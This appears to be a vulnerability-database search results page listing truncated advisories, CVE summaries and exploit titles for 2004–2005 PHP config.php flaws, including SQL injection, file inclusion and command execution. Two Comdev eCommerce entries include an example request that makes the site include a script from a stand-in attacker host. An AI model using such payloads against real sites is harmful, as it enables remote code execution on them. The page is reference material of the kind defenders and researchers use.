662 matches found
BlogPHP config.php SQL injection login bypass
--------------------Summary---------------- Software: BlogPHP Software's Web Site: http://www.blogphp.net/ Versions: 12 Type: SQL Injection Class: Remote Status: Unpatched Exploit: Available Solution: Not Available Discovered by: imei -----------------Description--------------- Vulnerable scripts...
CVE-2005-4686
PunBB 1.2.9, when used alone or with F-ART BLOG:CMS, includes config.php before calling the unregister_globals function, which allows attackers to obtain unspecified sensitive information...
CVE-2005-4214
CVE-2005-4214 concerns phpCOIN 1.2.2. Affected component: installation/config flow via config.php. Root cause: the _CCFG['_PKG_PATH_DBSE'] variable is not defined, causing an error message that leaks the installation path to remote attackers. Impact: partial disclosure of information (installatio...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
Exploit for unknown platform in category web applications. EkinBoard 1.0.3 config.php SQL Injection / Command Execution Exploit. this works with magicquotesg...
EkinBoard 1.0.3 - config.php SQL Injection Command Execution
EkinBoard 1.0.3 - config.php SQL Injection Command Execution this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on...
EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit
No description provided by source. <?php ---ekin103xpl.php 10.47 16/11/2005 EkinBoard 1.0.3 config.php SQL Injection through cookie / remote commands execution --- this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields,...
EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution
this works with magic_quotes_gpc off coded by rgod site: http://rgod.altervista.org usage: launch from Apache, fill in requested fields, then go! required php.ini settings to launch this script: allow_call_time_pass_reference = on register_globals = on Sun-Tzu: "The rising of birds in their flight is th...
CVE-2005-2544
PHP remote file inclusion vulnerability in config.php in Comdev eCommerce 3.0 allows remote attackers to execute arbitrary PHP code via the pathdocroot parameter...
Comdev eCommerce config.php Vulnerability
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
comdevInclusion.txt
Class: Input Validation Error Vulnerable: Comdev Comdev eCommerce 3.0 The config.php script can be passed a "pathdocroot" http request parameter to change the location of an included file. Example: http://www.vulnerable.com/oneadmin/config.php?pathdocroot=http://www.hacker.com/badscript.php.txt...
CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-2149
CVE-2005-2149 affects Cacti
DEBIAN-CVE-2005-2149
config.php in Cacti 0.8.6e and earlier allows remote attackers to set the no_http_headers switch, then modify session information to gain privileges and disable the use of addslashes to conduct SQL injection attacks...
CVE-2005-1696
Multiple cross-site scripting (XSS) vulnerabilities in PostNuke 0.750 and 0.760RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) skin or (2) paletteid parameter to demo.php in the Xanthia module, or (3) the serverName parameter to config.php in the Multisites (aka NS-Multisites)...
phpBB Upload Script "up.php" Arbitrary File Upload
Advisory 1 "phpBB Upload Script "up.php" Arbitrary File Upload" $ Author: Status-x $ Contact: [email protected] - [email protected] $ Date: 7 April 2005 $ Website: http://defacers.com.mx $ Original Advisory: http://www.defacers.com.mx/advisories/2.txt $ Risk: High $ Vendor URL:...
CVE-2004-1504
The CVE concerns Just Another Flat File (JAF) CMS 3.0RC. The vulnerability is in the displaycontent function of config.php, which allows remote attackers to gain sensitive information by supplying a blank show parameter; an error message reveals the installation path (demonstrated with index.php)...
phphpbb2 + php version < 4.3.10 unserialize() memory dump sql password from config.php exploit
php bug in ext/standard/var_unserializer.c in php 4.3.10 for dump php heap memory with phpbb2, who use unserialize for cookie, and found the config.php sql password in the heap. you need http://overdose.tcpteam.org/serv.h and http://overdose.tcpteam.org/serv.cpp for compile / coded by overdose...
PhpDig 1.6.x: remote command execution
Product: PhpDig 1.6.x Vendor: phpdig.net Author: FraMe frame at kernelpanik.org URL: http://www.kernelpanik.org CONTENTS 1. Overview 2. Description. 3. Details 4. Patches. 1. Overview. PhpDig is a http spider/search engine written in Php with a MySql database in backend. PhpDig builds a glossary...